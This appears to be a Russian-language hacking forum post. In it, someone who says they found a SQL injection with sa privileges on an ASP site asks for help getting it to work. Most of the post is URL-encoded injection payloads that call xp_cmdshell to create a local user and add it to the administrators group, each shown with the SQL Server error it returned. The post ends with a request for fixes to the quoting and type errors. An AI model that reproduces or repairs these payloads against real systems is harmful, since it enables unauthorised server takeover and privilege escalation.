нашёл ещё одну inj с правами sa там там возникает такая ошибка при подстановке -1'
Unclosed quotation mark after the character string '-1''. Incorrect syntax near '-1''.
site.com/index.asp?id=1;exec%20master..xp_cmdshell%20%20%22 net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test %20/add%22--
Conversion failed when converting the varchar value '1;exec master..xp_cmdshell "net user test pass /add ' to data type int.
site.com/index.asp?id=1';exec%20master..xp_cmdshell%20%20%2 2net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test %20/add%22--
Unclosed quotation mark after the character string 'net user test pass /add ''.
пытаюсь сам думать но недогоняю) подскажите плз
как я понял тут в одной переменной скрипта id передаются два запроса к базе и нужно правильно вставить свой запрос и второй запрос закрыть (может конечно я глупость сказал )
так ещё пробовал
site.com/bug.asp?ID=1';exec%20master..xp_cmdshell%20%20net% 20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test %20/add%22;1';--
Incorrect syntax near the keyword 'user'. Unclosed quotation mark after the character string ''.
непонял ещё
Conversion failed when converting the varchar value
что тут тип нужно чтоли указывать...подскажите тогда как это зделать?